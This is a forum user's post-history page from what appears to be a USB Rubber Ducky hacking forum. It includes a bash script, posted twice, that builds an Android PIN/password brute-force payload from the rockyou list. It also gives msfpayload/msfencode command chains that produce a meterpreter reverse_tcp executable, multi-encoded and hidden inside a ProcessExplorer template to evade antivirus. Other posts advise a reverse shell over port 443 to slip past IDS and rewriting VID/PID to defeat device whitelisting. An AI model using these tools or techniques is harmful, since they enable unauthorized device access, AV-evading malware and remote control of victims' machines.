CaptainHooligan
-
Posts
12 -
Joined
-
Last visited
-
Days Won
1
Posts posted by CaptainHooligan
-
-
Not with version 2 firmware (normally whitelist is based off VID & PID), assuming you have a laptop you can re-write vidpid.bin to support the VID&PID of known device (obtainable from device manager on Win_X or lsusb (usbutils package)(or at least dev) on Unix).
Bypass AV/HBSS for the win!
Good call! As always the more research you do on a target the better prepared you can be.
-
Great share! Just as mentioned above, some AV solutions include a Host Based Security System (HBSS) which can whitelist hardware as well as software. In an environment that uses all Dell keyboards or just specific ones that do not use generic drivers this attack would be defeated.
-
That was pretty much the point I was trying to make, there is always a way to get around what security implementations you run into. The duck does appear as a HID which means what user limits we run into are what we have to deal with. If the security implementation has application white listing the download will not matter as the .exe will not be allowed to run. Typically in a locked environment downloading is limited to power users or administrators.
Either way, know the environment and plan accordingly as there is always a way when thinking outside the box.
-
It doesn't really matter what the limitations are set to users. There will always be some way to bypass security in one way or another. For example: robust firewall solution combined with application white listing, limited permissions and USB mass storage disabled means you aren't going to be able to download a file nor will you be able to bring one in.
-
This is a payload generator script. This is the first version and it currently only builds payloads to brute force android PINs and Passwords. Basically what it does is check to ensure prerequisites are met, then generates the payload selected. Right now it works and does what it says it's going to do. Enjoy and please send feedback on functions, etc.
Since I'm not able to upload the scripts themselves and it is over 900 lines of code it is hosted on an external link. You can download here:
https://docs.google.com/file/d/0B7P5FQhXHcvdeXZ1cDk3TUV2NFk/edit?usp=sharing
-
Any easy thought is can these PC's access the internet behind the routers and firewall? If so just run a secure reverse shell over 443. Some IDS will look at the tcp stream and see the amount of traffic as anomalous but most will see encrypted traffic and ignore it.
-
Another good thing to do would be to download the rockyou password list
from skullsecurity. Take like the top 5000 out of it as it is already
sorted by most frequently used to least. If a device is encrypted this
will save you tons of time as there is no 5 password then wait limiter.
Here
is a script that will grab rockyou.txt and create a payload for you in
linux. Right now it does wait 30 seconds after every 5 passwords. I'm
adding an option to not wait 30 seconds as if attacking the encryption
logon screen.#!/bin/bash clear echo -e "========================================================" echo -e " This script downloads the rockyou password list" echo -e " then takes the top 5000 passwords and generates" echo -e " an Android brute forcer." echo -e "========================================================" echo -e " You need to have duckencode.jar installed as well" echo -e " as bzip2 and wget." echo -e "========================================================" echo -e " This script is licensed under the GPLv3 and is" echo -e " currently maintained by James Luther (CaptainHooligan)" echo -e "========================================================" echo "" echo "" WHOAMI=`id | sed -e 's/(.*//'` if [ "$WHOAMI" != "uid=0" ] ; then echo "Sorry, you need super user access to run this script." exit 1 fi echo -e "Verifying prerequisites are installed ... " echo "" duckdir=`find / -name duckencode.jar` if [ -z "$duckdir" ] ; then echo "Duckencode.jar not found on system. Please verify you have this installed." exit 1 else echo "Duckencode.jar prerequisite met." fi duckinpath=`which duckencode.jar` if [ -z "$duckinpath" ] ; then PATH=$PATH:$duckdir fi bundir=`find / -name bzip2` if [ -z "$bundir" ] ; then echo "Bzip2 not found on system. Please verify you have this installed." exit 1 else echo "Bzip2 prerequisite met." fi buninpath=`which bzip2` if [ -z "$buninpath" ] ; then PATH=$PATH:$bundir fi wgetdir=`find / -name wget` if [ -z "$wgetdir" ] ; then echo "Wget not found on system. Please verify you have this installed." exit 1 else echo "Wget prerequisite met." fi wgetinpath=`which wget` if [ -z "$wgetinpath" ] ; then PATH=$PATH:$wgetdir fi echo "" echo "" #echo -e "Which do you want to attack?" #echo -e " 1. Encryption Screen" #echo -e " 2. Password Screen" #read answer #case answer # 1) echo -e "Verify connection to internet and press [Enter]." read echo "" echo "" echo -e "Downloading rockyou password list. This can take some time ..." echo "" echo "" wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 bunzip rockyou.txt.bz2 echo "" echo "" echo -e "Creating rock-android.txt file ... " echo "" echo "" echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt echo -e "rock-android.txt created!" ls -lart rock-android.txt echo "" echo "" echo -e "Creating inject.bin file ... " java -jar duckencode.jar -i rock-android.txt echo "" echo "" echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!" ls -lart inject.bin
-
Check out dSploit. It is an open source project similar to this.
-
I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/coundown -c 5 -t exe payload.exe
[/CODE]That sometimes still gets caught which is when I use a custom template which isn't too hard to do. Any windows executable can be used as a template. ProcessExplorer is an easy one to get your hands on and systinternals has a free download. All you need to do to run that is:
[CODE]
wget http://download.sysinternals.com/Files/ProcessExplorer.zip
unzip ProcessExplorer.zip
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -t exe -x procexp.exe (This is the ProcessExplorer executable from zip) -o payload.exe -e x86/shikata_ga_nai -c 5
[/CODE]As was mentioned in previous posts msfvenom is more updated than msfencode but when using a custom template (any windows executable) usually there is no problem at all bypassing AV.
-
Why not just use msfencode?
-
Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter.
** Edit **
Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.
#!/bin/bash
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
WHOAMI=`id | sed -e 's/(.*//'`
if [ "$WHOAMI" != "uid=0" ] ; then
echo "Sorry, you need super user access to run this script."
exit 1
fi
echo -e "Verifying prerequisites are installed ... "
echo ""
duckdir=`find / -name duckencode.jar`
if [ -z "$duckdir" ] ; then
echo "Duckencode.jar not found on system. Please verify you have this installed."
exit 1
else
echo "Duckencode.jar prerequisite met."
fi
duckinpath=`which duckencode.jar`
if [ -z "$duckinpath" ] ; then
PATH=$PATH:$duckdir
fi
bundir=`find / -name bzip2`
if [ -z "$bundir" ] ; then
echo "Bzip2 not found on system. Please verify you have this installed."
exit 1
else
echo "Bzip2 prerequisite met."
fi
buninpath=`which bzip2`
if [ -z "$buninpath" ] ; then
PATH=$PATH:$bundir
fi
wgetdir=`find / -name wget`
if [ -z "$wgetdir" ] ; then
echo "Wget not found on system. Please verify you have this installed."
exit 1
else
echo "Wget prerequisite met."
fi
wgetinpath=`which wget`
if [ -z "$wgetinpath" ] ; then
PATH=$PATH:$wgetdir
fi
echo ""
echo ""
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
read
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip rockyou.txt.bz2
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
echo DELAY 5000 > rock-android.txt; head -5000 rockyou.txt | sed -e 's/^/STRING /' | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> rock-android.txt
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar duckencode.jar -i rock-android.txt
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin
[/CODE]- 1
[Release] Simple-Ducky Payload Generator v1.1.1 (International Key Mapping|Kali Compatible|Custom Payload Builder)
in Classic USB Rubber Ducky
Posted · Edited by CaptainHooligan
Awesome work! I started a project exactly like this a couple months ago but work struck and I haven't had time to maintain it. Below is the code for the pseudo framework shell script I wrote. Maybe you can digest it into your setup to add graphical menus with the dialog commands I used. You could also use zenity.